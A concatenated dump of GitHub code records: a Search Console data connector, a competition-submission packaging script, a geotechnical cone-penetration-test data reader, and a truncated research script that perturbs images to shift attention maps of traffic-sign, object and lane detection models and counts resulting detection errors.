in orignal order clicks, ctr, impressions, positions, date, query, page, country, device\n dfGSC = dfGSC[[\"clicks\", \"ctr\", \"impressions\", \"position\", \"date\", \"query\", \"page\", \"country\", \"device\"]]\n #send rows got in dataframe transformed in dict \n for row in dfGSC.to_dict(orient='records'):\n yield row #Each yield in the generator becomes a row in the dataset.\n\n\n\n def get_writer(self, dataset_schema=None, dataset_partitioning=None,\n partition_id=None):\n \"\"\"\n Returns a write object to write in the dataset (or in a partition)\n\n The dataset_schema given here will match the the rows passed in to the writer.\n\n Note: the writer is responsible for clearing the partition, if relevant\n \"\"\"\n raise Exception(\"Unimplemented\")\n\n\n def get_partitioning(self):\n \"\"\"\n Return the partitioning schema that the connector defines.\n \"\"\"\n raise Exception(\"Unimplemented\")\n\n def get_records_count(self, partition_id=None):\n \"\"\"\n Returns the count of records for the dataset (or a partition).\n\n Implementation is only required if the field \"canCountRecords\" is set to\n true in the connector.json\n \"\"\"\n \n raise Exception(\"unimplemented\")\n","repo_name":"Anakeyn/Dataiku-DSS-Anakeyn-GoogleSearchConsole","sub_path":"python-connectors/gsc/connector.py","file_name":"connector.py","file_ext":"py","file_size_in_byte":13168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5572089432","text":"import shutil\nimport io\nimport os\nimport sys\nfrom argparse import ArgumentParser\n\nimport pandas as pd\nimport subprocess\n\nfrom src.utils.project_dirs import data_dir, work_dir, submit_dir, tool_dir, root_dir\n\n\ndef parse_args():\n parser = ArgumentParser()\n parser.add_argument('exp_name')\n parser.add_argument('--validate', action='store_true')\n return parser.parse_args()\n\n\ndef main():\n args = parse_args()\n # Dataset directory\n DATASET_DIR = data_dir / 'jpx_latest'\n # Log directory\n LOG_DIR = work_dir / args.exp_name\n # Submit directory\n SUBMIT_DIR = submit_dir / args.exp_name\n SUBMIT_MODEL_DIR = SUBMIT_DIR / 'model'\n # shutil.copy(root_dir / 'docker' / 'requirements.txt', SUBMIT_DIR)\n if not SUBMIT_MODEL_DIR.exists():\n SUBMIT_MODEL_DIR.mkdir()\n src_files = list(LOG_DIR.glob('final_lgb_label*'))\n src_files += [LOG_DIR / 'le_dict.pkl', LOG_DIR / 'normalize_value.csv', tool_dir / 'infos' / 'nikkei225.txt']\n for src_file in src_files:\n shutil.copy(src_file, SUBMIT_MODEL_DIR)\n\n # Change directory\n os.chdir(SUBMIT_DIR / 'src')\n # Add python path\n sys.path.append(str(SUBMIT_DIR / 'src'))\n\n from predictor import ScoringService\n inputs = {\n 'stock_list': str(DATASET_DIR / 'stock_list.csv.gz'),\n 'stock_price': str(DATASET_DIR / 'stock_price.csv.gz'),\n 'stock_fin': str(DATASET_DIR / 'stock_fin.csv.gz'),\n 'stock_labels': str(DATASET_DIR / 'stock_labels.csv.gz'),\n }\n if args.validate:\n if ScoringService.get_model():\n ScoringService.predict(inputs, check_val_score=True)\n else:\n raise NotImplementedError\n else:\n if ScoringService.get_model():\n result = ScoringService.predict(inputs)\n else:\n raise NotImplementedError\n\n # Check result\n df = pd.read_csv(io.StringIO(result), header=None)\n print(df.shape)\n print(df.head())\n\n os.chdir('../')\n subprocess.call('zip -v submit.zip requirements.txt src/*.py model/*', shell=True)\n\n out_dir = work_dir / args.exp_name\n subprocess.call(f'mv submit.zip {out_dir}', shell=True)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"nyoki-mtl/jpx1-3rd","sub_path":"tools/check_submit_files.py","file_name":"check_submit_files.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"41754254541","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 21 13:53:14 2021\n\n@author: Arian Kamphuis\n\"\"\"\nimport datetime\nbegin_time = datetime.datetime.now()\nprint(\"Starting CPT-Reader\")\nimport feather\nimport numpy as np\nimport pandas as pd\nimport matplotlib\nmatplotlib.use('agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\ndef readFiles():\n path ='\\CPTs'\n cwd = os.getcwd()\n print('Current directory is:', cwd)\n os.chdir(cwd+path)\n retval = os.getcwd()\n print('Succesfully changed to:',retval)\n files = [f for f in listdir(retval) if isfile(join(retval,f))]\n print('Files:', files)\n return retval,files,cwd\n\n\nclass GEF:\n def __init__(self):\n self._data_seperator = \";\"\n self._columns = {}\n\n self.x = 0.\n self.y = 0.\n self.z = 0.\n self.dz = []\n self.qc = []\n self.pw = []\n self.wg = []\n self.qs = []\n self.qt = []\n self.k = []\n\n \n\n def readFile(self, filename):\n print(filename)\n lines = open(filename, 'r').readlines()\n reading_header = True\n \n for line in lines: \n\n if reading_header:\n self._parseHeaderLine(line)\n else:\n self._parseDataLine(line)\n \n if line.find('#EOH') > -1:\n if self._check_header():\n reading_header = False\n else:\n return\n self.qs = self.addSleeveResistance()\n self.qt = self.TotConeResistance()\n \n def _check_header(self):\n if not 1 in self._columns:\n print(\"Fatale fout > Dit GEF bestand mist een diepte kolom\")\n return False\n \n if not 2 in self._columns:\n print(\"Fatale fout > Dit GEF bestand mist een qc (conusweerstand) kolom\")\n return False\n \n if not 3 in self._columns:\n print(\"Fatale fout > Dit GEF bestand mist een fs (plaatselijke wrijving pw) kolom\")\n return False \n if not 6 in self._columns:\n print('Geen u2 (pore pressure) gevonden in de file. qt = qc')\n return True\n \n def _parseHeaderLine(self, line):\n keyword, argline = line.split('=')\n keyword = keyword.strip()\n argline = argline.strip()\n args = argline.split(',')\n\n if keyword=='#XYID':\n self.x = float(args[1].strip())\n self.y = float(args[2].strip())\n elif keyword=='#ZID':\n self.z = float(args[1].strip())\n elif keyword=='#COLUMNINFO':\n column = int(args[0])\n dtype = int(args[-1].strip())\n if dtype==11: \n dtype = 1\n self._columns[dtype] = column - 1\n \n def _parseDataLine(self, line):\n args = line.split(self._data_seperator)\n\n dz =self.z -float(args[self._columns[1]])\n\n qc = float(args[self._columns[2]])\n pw = float(args[self._columns[3]]) \n \n \n self.dz.append(dz)\n self.qc.append(qc)\n self.pw.append(pw)\n \n \n if qc<=0:\n self.wg.append(10)\n else:\n wg = (pw / qc) * 100\n if wg > 10:\n wg = 10\n elif wg == 0:#remove wg of 0, to avoid division by 0\n wg = 0.01\n self.wg.append(wg)\n \n\n\n def asNumpy(self):\n Isbt = self.Robertson()\n Su = self.UndrainedShearStrength()\n sigma_vo, sigma_vo_eff,hydroPressure = self.InSituStress()\n return np.transpose(np.array([self.dz,self.qt,self.pw,self.qc,self.wg,self.qs,sigma_vo,sigma_vo_eff,hydroPressure, Isbt,Su]))\n \n \n def addSleeveResistance(self):\n product = []\n for i,j in zip(self.qc,self.wg):\n product.append(i*j)\n return product\n \n \n def asDataFrame(self):\n a = self.asNumpy()\n return pd.DataFrame(data=a, columns=['depth', 'qt','fs', 'qc','wg','qs','sigma_vo','sigma_vo_eff','u0','Isbt','Su'])\n \n def Robertson(self):\n Pa = 0.1 #MPa\n quotient = [n/Pa for n in self.qc]\n Isbt = ((3.47-np.log10(quotient))**2+(np.log10(self.wg)+1.22)**2)**0.5 #wg bevat een 0\n return Isbt\n \n def HydraulicConductivity(self):\n Isbt = self.Robertson()\n for i in Isbt:\n if i < 3.27:\n k = 10**(0.952-3.04*i) #m/s\n elif i>3.27 and i<4:\n k = 10**(-4.52-1.37*i) #m/s\n else:\n print(\"can't compute k\")\n k= 0\n self.k.append(k)\n \n def u_porepressure(self):\n gamma_water = 9.81 #kN/m^3\n wrong = self.dz[0]\n corrected = 0 #assuming water table at ground level\n constant = wrong + corrected\n height_lst = -np.subtract(self.dz,constant)\n hydroPressure=[n*gamma_water for n in height_lst]\n hydroPressure = [n/1000 for n in hydroPressure]\n return hydroPressure\n \n def Soilpressures(self):\n wg = self.wg \n qc = self.qc\n gam_ref = 19*np.ones(len(wg))\n qt_ref = 5*np.ones(len(wg))\n Rf_ref = 30*np.ones(len(wg))\n beta = 4.12*np.ones(len(wg))\n gamma_sat = (gam_ref - beta*((np.log10(qt_ref/qc))/(Rf_ref/wg)))/1000\n CorHeightlst = np.abs(self.dz - self.dz[0]*np.ones(len(self.dz)))\n sigma_vo = gamma_sat*CorHeightlst\n return sigma_vo\n \n def InSituStress(self,):\n hydroPressure = self.u_porepressure()\n sigma_vo = self.Soilpressures()\n sigma_vo_eff = np.subtract(sigma_vo,hydroPressure)\n sigma_vo = np.nan_to_num(sigma_vo)\n sigma_vo_eff = np.nan_to_num(sigma_vo_eff)\n return sigma_vo, sigma_vo_eff,hydroPressure\n \n def TotConeResistance(self):\n #u2 nodig ipv u0\n #inbouwen dat error als u2 niet bestaat, dan qt = qc\n hydroPressure = self.u_porepressure()\n a = 0.7 #usual value between 0.6-0.85 to remove adverse effects of the uneven shape of the cone\n product = [n*(1-a) for n in hydroPressure]\n #print(\"Product\",hydroPressure)\n qt = [sum(x) for x in zip(self.qc,product)]\n return qt\n \n def NetConePressure(self):\n qt = self.TotConeResistance()\n sigma_vo, sigma_vo_eff,hydroPressure = self.InSituStress()\n qn = np.subtract(qt, sigma_vo)\n return qn\n \n def Normalization(self): #Doesn' work, negative Qt, thus NaN for Ic\n sigma_vo,sigma_vo_eff,hydroPressure = self.InSituStress()\n qt = self.TotConeResistance()\n Qt=(qt-sigma_vo)/sigma_vo_eff\n Fr= self.pw/(qt-sigma_vo)*100\n Ic = ((3.47-np.log10(Qt)**2)+np.log10(Fr+1.22)**2)**0.5\n return Qt,Fr,Ic \n \n # def Average_qt(self):\n # df = self.asDataFrame2()\n # d = df['depth']\n # qt = df['qt']\n # window_size = 8 #improve with calculation #cone is 164mm long\n # i = 0\n # moving_averages = []\n # d.drop(d.tail(window_size-1).index,inplace=True) # drop last n rows\n \n # while i < len(qt) - window_size + 1:\n # this_window = qt[i : i + window_size]\n \n # window_average = sum(this_window) / window_size\n # moving_averages.append(window_average)\n # i += 1\n # qt_avg = moving_averages\n # return qt_avg,d\n \n def UndrainedShearStrength(self):\n sigma_vo,sigma_vo_eff,hydroPressure = self.InSituStress()\n qt = self.TotConeResistance()\n #qt = self.TotConeResistance()\n Nkt = 12*np.ones(len(sigma_vo)) #range 10-18, sometimes even 6 for weak soft soils\n Su = np.subtract(qt,sigma_vo)/Nkt\n Su = np.nan_to_num(Su)\n return Su\n \n def SoilSensitivity(self):\n Su = self.UndrainedShearStrength()\n for i in range(len(self.pw)):\n if self.pw[i] <0.01:\n self.pw[i]=np.nan\n St = Su * ((1*np.ones(len(self.pw)))/self.pw)\n return St\n \n def SBTplot(self,filename):\n Ic = self.Robertson()\n index = []\n for i in range(len(Ic)):\n if Ic[i] > 3.6:\n index.append(2)\n elif Ic[i] > 2.95 and Ic[i] <=3.6:\n index.append(3)\n elif Ic[i] > 2.60 and Ic[i] <=2.95:\n index.append(4)\n elif Ic[i] > 2.05 and Ic[i] <=2.60:\n index.append(5)\n elif Ic[i] > 1.31 and Ic[i] <=2.05:\n index.append(6)\n else:\n index.append(7)\n z = int(self.dz[-1])\n ylim = z+1\n\n fig = plt.figure(figsize=(30,15))\n ax1 = fig.add_subplot(131)\n ax1.plot(self.qc,self.dz,color='black', label=\"qc\")\n ax1.set_ylim(0,ylim)\n ax1.set_xlim(0,55.0)\n \n ax1.invert_yaxis()\n ax1.minorticks_on()\n ax1.grid(True, which='both')\n ax1.legend(loc=3)\n ax1.set_ylabel(\"depth (m)\",size=12)\n ax1.set_xlabel(\"qc (MPa)\",size=12)\n \n ax2 = ax1.twiny()\n ax2.plot(self.wg,self.dz,color='green', label=\"wg\")\n ax2.set_ylim(0,ylim)\n ax2.set_xlim(0,25.0)\n ax2.invert_xaxis()\n ax2.invert_yaxis()\n ax2.set_xlabel(\"wg (%)\",size=12)\n \n ax3 = fig.add_subplot(132)\n ax3.plot(Ic,self.dz,color='yellow',linewidth=2)\n ax3.set_ylim(0,ylim)\n ax3.set_xlim(1.0,4.0)\n ax3.invert_yaxis()\n ax3.text(1.05, -9.8, \"gravel - dense sand\", va='bottom', rotation=90, size=17, color=\"white\")\n ax3.text(1.55, -9.8, \"clean sand - silty sand\", va='bottom', rotation=90, size=17, color=\"white\")\n ax3.text(2.22, -9.8, \"silty sand - sandy silt\", va='bottom', rotation=90, size=17, color=\"white\")\n ax3.text(2.65, -9.8, \"clayey silt - silty clay\", va='bottom', rotation=90, size=17, color=\"white\")\n ax3.text(3.2, -9.8, \"silty clay - clay\", va='bottom', rotation=90, size=17, color=\"white\")\n ax3.text(3.65, -9.8, \"peat\", va='bottom', rotation=90, size=17, color=\"white\")\n\n ax3.add_patch(patches.Rectangle((0,0),1.31,ylim,facecolor='darkgoldenrod'))\n ax3.add_patch(patches.Rectangle((1.31,0),0.74,ylim,facecolor='goldenrod'))\n ax3.add_patch(patches.Rectangle((2.05,0),0.55,ylim,facecolor='mediumseagreen'))\n ax3.add_patch(patches.Rectangle((2.60,0),0.35,ylim,facecolor='seagreen'))\n ax3.add_patch(patches.Rectangle((2.95,0),0.65,ylim,facecolor='cadetblue'))\n ax3.add_patch(patches.Rectangle((3.6,0),0.4,ylim,facecolor='sienna'))\n ax3.yaxis.grid(which=\"minor\")\n ax3.yaxis.grid(which=\"major\")\n ax3.xaxis.grid(which=\"major\")\n ax3.minorticks_on()\n\n ax3.set_xlabel(\"Ic SBT\",size=12)\n ax3.set_ylabel(\"depth (m)\")\n \n ax4 = fig.add_subplot(133)\n for i in range(len(Ic)-1):\n if index[i+1] == 2:\n colour = 'sienna'\n elif index[i+1] == 3:\n colour = 'cadetblue'\n elif index[i+1] == 4:\n colour = 'seagreen'\n elif index[i+1] == 5:\n colour = 'mediumseagreen'\n elif index[i+1] == 6:\n colour = 'goldenrod'\n elif index[i+1] == 7:\n colour = 'darkgoldenrod'\n ax4.add_patch(patches.Rectangle((0,self.dz[i]),index[i+1],(0.1),facecolor=colour))\n ax4.set_ylim(0,ylim)\n ax4.set_xlim(0,10.0)\n ax4.set_ylabel(\"depth (m)\")\n ax4.invert_yaxis()\n ax4.yaxis.grid(which=\"major\")\n ax4.yaxis.grid(which=\"minor\")\n ax4.xaxis.grid(which=\"major\")\n ax4.minorticks_on()\n \n plt.savefig(filename)\n plt.close(None)\n \n def plot(self, filename): \n df = self.asDataFrame()\n fig, axes = plt.subplots(nrows=1, ncols=6, figsize=(20,12), gridspec_kw = {'width_ratios':[3, 1, 2, 1, 1,1]})\n axes[0].set_xlim([0,40])\n df.plot(x='qc', y='depth', ax=axes[0], sharey=True, label='qc, cone resistance [MPa]')\n df.plot(x='qt', y='depth', ax=axes[0], sharey=True, label='qt, corrected cone resistance [MPa]')\n df.plot(x='fs', y='depth', ax=axes[1], sharey=True, label='fs, local/friction resistance [MPa]')\n df.plot(x='wg', y='depth', ax=axes[2], sharey=True, label='wg, friction ratio [%]')\n df.plot(x='qs', y='depth', ax=axes[3], sharey=True, label='qs, sleeve resistane[kPa]')\n df.plot(x='u0', y='depth', ax=axes[4], sharey=True, label='u0, water pressure[MPa]')\n df.plot(x='Isbt', y='depth',ax=axes[5], sharey=True, label='Isbt, non-normalized Soil behaviour Type index')\n\n \n for i in range(6): axes[i].grid()\n plt.savefig(filename)\n plt.close(None)\n \n\nretval,files,cwd = readFiles()\npurpose = 'export'\n\n\n\ndef LoopReader(retval,file,purpose,cwd):\n path ='\\CPTs'\n os.chdir(cwd+path)\n if __name__==\"__main__\":\n g = GEF()\n g.readFile(file)\n file = file.strip('.gef')\n print(file)\n if purpose == 'export':\n Export_df = g.asDataFrame()\n filename = str(file) + '.feather'\n os.chdir(cwd) \n feather.write_dataframe(Export_df, filename)\n print(\"Finished exporting data\")\n elif purpose =='plot':\n os.chdir(cwd)\n g.plot(file + \"_graphs_1.png\")\n # g.plot2(file + '_graphs_2.png')\n g.SBTplot(file+\"_SBT.png\")\n print(\"Finished plotting graphs\")\n else:\n print(\"Purpose not found\")\n\nfor i in files:\n LoopReader(retval,i,purpose,cwd)\n\n\nprint(\"Total runtime:\",datetime.datetime.now() - begin_time)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Arian125/thesis","sub_path":"CPT_reader.py","file_name":"CPT_reader.py","file_ext":"py","file_size_in_byte":13772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73657848553","text":"from __future__ import division\nimport os\nos.environ['CUDA_VISIBLE_DEVICES']='1'\n\nimport warnings\nwarnings.filterwarnings('ignore')\nwarnings.simplefilter('ignore')\n\nimport cv2\nimport argparse\nfrom PIL import Image\nimport shutil\nfrom io import BytesIO\n\nimport torch\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nimport torchvision\nfrom torch.optim import Optimizer\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\n\nfrom pytorch_grad_cam import EigenCAM\nfrom pytorch_grad_cam.utils.image import show_cam_on_image, scale_cam_image\nfrom pytorch_grad_cam.utils.model_targets import ClassifierOutputTarget\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\n\nfrom models_TS import *\nfrom utils_TS.utils_TS import *\nfrom utils_TS.datasets_TS import *\nfrom utils_TS.utils_TS import rescale_boxes_TS\nfrom utils_TS.datasets_TS import resize_TS\n\nfrom models_OD import *\nfrom utils_OD.utils_OD import *\nfrom utils_OD.datasets_OD import *\n\nfrom model_RL import SCNN\nfrom utils_RL.utils import *\nfrom utils_RL.prob2lines import getLane\nfrom utils_RL.transforms import *\nfrom torchvision import utils as vutils\n\nfrom typing import List\n\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom matplotlib.ticker import NullLocator\nfrom ALL_sign_data.resnet import ResNet18\nfrom tqdm import tqdm\n\nfrom attention_RL import GradCAMTensor\n\nimport pandas as pd\nimport csv\n\nimport wandb\n\nclass SegmentationModelOutputWrapper(torch.nn.Module):\n # 改变模型的输出格式来匹配GradCAMTensor\n def __init__(self, model): \n super(SegmentationModelOutputWrapper, self).__init__()\n self.model = model\n self.exist_pred = None\n\n def forward(self, x):\n seg_pred, exist_pred = self.model(x)[:2]\n self.exist_pred = exist_pred.detach().cpu().numpy()\n return seg_pred\n\nclass SemanticSegmentationTarget:\n def __init__(self, category, mask):\n self.category = category\n self.mask = torch.from_numpy(mask)\n if torch.cuda.is_available():\n self.mask = self.mask.cuda()\n \n def __call__(self, model_output):\n return (model_output[self.category, :, : ] * self.mask).sum()\n\nclass ActivationsAndGradientsNotDetached:\n \"\"\" Class for extracting activations and\n registering gradients from targetted intermediate layers \"\"\"\n\n def __init__(self, model, target_layers, reshape_transform):\n self.model = model\n self.gradients = []\n self.activations = []\n self.reshape_transform = reshape_transform\n self.handles = []\n for target_layer in target_layers:\n self.handles.append(\n target_layer.register_forward_hook(self.save_activation))\n # Because of https://github.com/pytorch/pytorch/issues/61519,\n # we don't use backward hook to record gradients.\n self.handles.append(\n target_layer.register_forward_hook(self.save_gradient))\n\n def save_activation(self, module, input, output):\n activation = output\n\n if self.reshape_transform is not None:\n activation = self.reshape_transform(activation)\n self.activations.append(activation)\n\n def save_gradient(self, module, input, output):\n if not hasattr(output, \"requires_grad\") or not output.requires_grad:\n # You can only register hooks on tensor requires grad.\n return\n\n # Gradients are computed in reverse order\n def _store_grad(grad):\n if self.reshape_transform is not None:\n grad = self.reshape_transform(grad)\n self.gradients = [grad] + self.gradients\n\n output.register_hook(_store_grad)\n\n def __call__(self, x):\n self.gradients = []\n self.activations = []\n return self.model(x)\n\n def release(self):\n for handle in self.handles:\n handle.remove()\n\nclass RemainTensor(EigenCAM):\n def __init__(self, model, target_layers, use_cuda=False, reshape_transform=None):\n super().__init__(model, target_layers, use_cuda, reshape_transform)\n self.activations_and_grads = ActivationsAndGradientsNotDetached(\n self.model, target_layers, reshape_transform)\n \n def forward(self, input_tensor: torch.Tensor, targets: List[torch.nn.Module], eigen_smooth: bool = False) -> torch.Tensor:\n if self.cuda:\n input_tensor = input_tensor.cuda()\n\n if self.compute_input_gradient:\n input_tensor = torch.autograd.Variable(input_tensor,\n requires_grad=True)\n\n outputs = self.activations_and_grads(input_tensor)\n if len(outputs)>1: outputs=outputs[0] # modified to adapt to yolov3\n if targets is None: # here to modify target class!!\n target_categories = np.argmax(outputs.cpu().data.numpy(), axis=-1)\n targets = [ClassifierOutputTarget(\n category) for category in target_categories]\n\n if self.uses_gradients:\n self.model.zero_grad()\n loss = sum([target(output)\n for target, output in zip(targets, outputs)])\n loss.backward(retain_graph=True)\n\n # In most of the saliency attribution papers, the saliency is\n # computed with a single target layer.\n # Commonly it is the last convolutional layer.\n # Here we support passing a list with multiple target layers.\n # It will compute the saliency image for every image,\n # and then aggregate them (with a default mean aggregation).\n # This gives you more flexibility in case you just want to\n # use all conv layers for example, all Batchnorm layers,\n # or something else.\n cam_per_layer = self.compute_cam_per_layer(input_tensor,\n targets,\n eigen_smooth)\n return self.aggregate_multi_layers(cam_per_layer)\n\n def compute_cam_per_layer(\n self,\n input_tensor: torch.Tensor,\n targets: List[torch.nn.Module],\n eigen_smooth: bool) -> torch.Tensor:\n activations_list = [a\n for a in self.activations_and_grads.activations] # here required grad is False!!\n grads_list = [g\n for g in self.activations_and_grads.gradients]\n target_size = self.get_target_width_height(input_tensor)\n\n cam_per_target_layer = []\n # Loop over the saliency image from every layer\n for i in range(len(self.target_layers)):\n target_layer = self.target_layers[i]\n layer_activations = None\n layer_grads = None\n if i < len(activations_list):\n layer_activations = activations_list[i]\n if i < len(grads_list):\n layer_grads = grads_list[i]\n\n cam = self.get_cam_image(layer_activations)\n cam2 = []\n for ca in cam:\n cam2.append(torch.maximum(ca, torch.tensor(0)))\n cam = cam2\n # cam = torch.maximum(cam, 0)\n scaled = self.scale_cam_image(cam, target_size)\n cam_per_target_layer.append(scaled[0])\n\n return cam_per_target_layer\n\n def scale_cam_image(self,cam,target_size=None):\n result = []\n for img in cam:\n img = img - torch.min(img)\n img = img / (1e-7 + torch.max(img))\n if target_size is not None:\n img=img.reshape(1,1,img.shape[0],img.shape[1])\n img=F.interpolate(img,size=target_size,mode='bilinear')\n # img = img.resize(target_size)\n result.append(img)\n # result = result.type(torch.float32)\n return result\n\n \n def get_cam_image(self, activation_batch):\n # TBD: use pytorch batch svd implementation\n activation_batch[torch.isnan(activation_batch)] = 0\n projections = []\n for activations in activation_batch:\n reshaped_activations = (activations).reshape(\n activations.shape[0], -1).T\n # Centering before the SVD seems to be important here,\n # Otherwise the image returned is negative\n reshaped_activations = reshaped_activations - \\\n reshaped_activations.mean(axis=0)\n U, S, VT = torch.linalg.svd(reshaped_activations, full_matrices=True)\n projection = reshaped_activations @ VT[0, :]\n projection = projection.reshape(activations.shape[1:])\n projections.append(projection)\n return projections\n \n def aggregate_multi_layers(\n self,\n cam_per_target_layer: torch.tensor) -> torch.tensor:\n cam_per_target_layer = torch.cat(cam_per_target_layer, axis=1)\n cam_per_target_layer = torch.maximum(cam_per_target_layer, torch.tensor(0))\n result = torch.mean(cam_per_target_layer, axis=1)\n return self.scale_cam_image(result)\n\nclass MyOptimizer(Optimizer):\n def __init__(self, params, lr) -> None:\n # self.lr = lr\n super().__init__(params, {})\n self.param_groups[0]['lr']=lr\n \n def step(self, closure=False):\n for param_group in self.param_groups:\n params = param_group['params']\n lr = param_group['lr']\n # 从param_group中拿出参数\n for param in params:\n # 循环更新���一个参数的值\n param.data = np.clip(param.data - lr * param.grad,0,1)\n\ndef classify_draw_TS(dir_,img_show,img_class,detections,nums,step=1):\n fig, ax = plt.subplots()\n j = 0\n objects=[]\n for i, (x1, y1, x2, y2, conf, cls_conf, cls_pred) in enumerate(detections): # one object in a image\n x1 = int(x1)\n y1 = int(y1)\n x2 = int(x2)\n y2 = int(y2)\n box_w = x2 - x1\n box_h = y2 - y1\n min_sign_size = 3\n size_show = int(100*img_show.size[0]/2048)\n # print(\"box 信息 x1,y1,x2,y2:\\n\",x1, y1,x2,y2)\n if box_w >= min_sign_size and box_h >= min_sign_size and conf >= 0.94:\n # print(conf,cls_conf)\n crop_sign_org = img_class.crop((x1-10, y1-10, x2+10, y2+10)).convert(mode=\"RGB\")\n ##### to class ###############\n test_transform = torchvision.transforms.Compose([ \n torchvision.transforms.Resize((28, 28), interpolation=2),\n torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize(mean=[0.5], std=[0.5])\n ])\n crop_sign_input = test_transform(crop_sign_org).unsqueeze(0)\n with torch.no_grad():\n pred_class = model_class_TS(crop_sign_input.to(device))\n # 输出结果是所有类别的置信度,基本上是,正确的结果大于1,其余都是负数\n # print(\"分类模型输出结果: \",torch.max(pred_class, 1))\n sign_type = torch.max(pred_class, 1)[1].to(\"cpu\").numpy()[0]\n # print(cls_pred)\n # 更新值-------------------------------------------------------------------------------\n cls_pred = sign_type\n \n # print(\"cls_pred_type = \", classes_TS[int(cls_pred)])#,\" cls_conf = \",cls_conf)\n # #####\n # draw image \n # #####\n if True and classes_TS[int(cls_pred)] != \"zo\":\n # save predict results to a json file: my_train_results.json\n objects.append([int(cls_pred), x1, y1, x2, y2])\n\n color = \"r\"\n\n bbox = patches.Rectangle((x1, y1), box_w, box_h, linewidth=1, edgecolor=color, facecolor=\"none\")\n ax.add_patch(bbox)\n\n pad_sign_path_png = \"ALL_sign_data/pad-all/\" + classes_TS[int(cls_pred)] + \".png\"\n pad_sign_path_jpg = \"ALL_sign_data/pad-all/\" + classes_TS[int(cls_pred)] + \".jpg\"\n if os.path.isfile(pad_sign_path_png):\n pad_sign = Image.open(pad_sign_path_png)\n elif os.path.isfile(pad_sign_path_jpg):\n pad_sign = Image.open(pad_sign_path_jpg)\n else:\n pad_sign = Image.new(\"RGB\", (size_show, size_show), (255, 255, 255))\n\n img_show.paste(crop_sign_org.resize((size_show, size_show)), (0, j * size_show) )\n img_show.paste(pad_sign.resize((size_show, size_show)), (size_show, j * size_show) )\n j += 1\n \n\n # Save generated image with detections\n ax.imshow(img_show)\n plt.axis(\"off\")\n plt.gca().xaxis.set_major_locator(NullLocator())\n plt.gca().yaxis.set_major_locator(NullLocator())\n buffer = BytesIO()\n plt.savefig(buffer, format='png')\n img_upload = np.asarray(Image.open(buffer))\n\n plt.close()\n return objects,img_upload\n\ndef compute_loss(cam_now,cam_orient,option):\n '''\n option: 1->var; 2 -> + l2-norm(Differ);\n '''\n if option==1:\n # var\n loss = torch.var(cam_now,unbiased=False)\n elif option==2:\n # l2-norm(Differ) \n loss = torch.norm(cam_now-cam_orient,p=2)\n elif option==3:\n loss = torch.norm(cam_now-cam_orient,p=1)\n else:\n loss = torch.var(cam_now,unbiased=False)\n return loss\n\ndef Iou_TS(box1, box2, wh=False):\n if wh == False:\n xmin1, ymin1, xmax1, ymax1 = box1\n xmin2, ymin2, xmax2, ymax2 = box2\n else:\n xmin1, ymin1 = int(box1[0]-box1[2]/2.0), int(box1[1]-box1[3]/2.0)\n xmax1, ymax1 = int(box1[0]+box1[2]/2.0), int(box1[1]+box1[3]/2.0)\n xmin2, ymin2 = int(box2[0]-box2[2]/2.0), int(box2[1]-box2[3]/2.0)\n xmax2, ymax2 = int(box2[0]+box2[2]/2.0), int(box2[1]+box2[3]/2.0)\n # 获取矩形框交集对应的左上角和右下角的坐标(intersection)\n xx1 = max([xmin1, xmin2])\n yy1 = max([ymin1, ymin2])\n xx2 = min([xmax1, xmax2])\n yy2 = min([ymax1, ymax2])\t\n # 计算两个矩形框面积\n area1 = (xmax1-xmin1) * (ymax1-ymin1) \n area2 = (xmax2-xmin2) * (ymax2-ymin2)\n inter_area = (max([0, xx2-xx1])) * (max([0, yy2-yy1])) #计算交集面积\n iou = inter_area / (area1+area2-inter_area+1e-6) #计算交并比\n return iou\n\ndef Iou_OD(box1, box2, wh=False):\n if wh == False:\n xmin1, ymin1, xmax1, ymax1 = box1\n xmin2, ymin2, xmax2, ymax2 = box2\n else:\n xmin1, ymin1 = int(box1[0]-box1[2]/2.0), int(box1[1]-box1[3]/2.0)\n xmax1, ymax1 = int(box1[0]+box1[2]/2.0), int(box1[1]+box1[3]/2.0)\n xmin2, ymin2 = int(box2[0]-box2[2]/2.0), int(box2[1]-box2[3]/2.0)\n xmax2, ymax2 = int(box2[0]+box2[2]/2.0), int(box2[1]+box2[3]/2.0)\n # 获取矩形框交集对应的左上角和右下角的坐标(intersection)\n xx1 = max([xmin1, xmin2])\n yy1 = max([ymin1, ymin2])\n xx2 = min([xmax1, xmax2])\n yy2 = min([ymax1, ymax2])\t\n # 计算两个矩形框面积\n area1 = (xmax1-xmin1) * (ymax1-ymin1) \n area2 = (xmax2-xmin2) * (ymax2-ymin2)\n inter_area = (max([0, xx2-xx1])) * (max([0, yy2-yy1])) #计算交集面积\n iou = inter_area / (area1+area2-inter_area+1e-6) #计算交并比\n\n return iou\n\ndef Miss_Generation_Misdetect_TS(obj_0,obj_i):\n # [int(cls_pred), x1, y1, x2, y2]\n len0=len(obj_0)\n leni=len(obj_i)\n cls0=[x[0] for x in obj_0]\n clsi=[x[0] for x in obj_i]\n x10 =[x[1] for x in obj_0]\n x1i =[x[1] for x in obj_i]\n y10 =[x[2] for x in obj_0]\n y1i =[x[2] for x in obj_i]\n x20 =[x[3] for x in obj_0]\n x2i =[x[3] for x in obj_i]\n y20 =[x[4] for x in obj_0]\n y2i =[x[4] for x in obj_i]\n miss=0\n generation=0\n misdetect=0\n if len0 >leni:\n miss=1\n elif len0 0.4: # 相同位置\n # input()\n i_difpos=0 # 相同位置应该认为是误判或者丢失,一定不是generation\n if clsi[j]!=cls0[i]: #标签不同,相同位置,误判\n i_misclass+=1\n else: # 相同位置,相同标签,那么就没有miss\n i_mis=0\n Ismisclass[i]=bool(i_misclass)\n 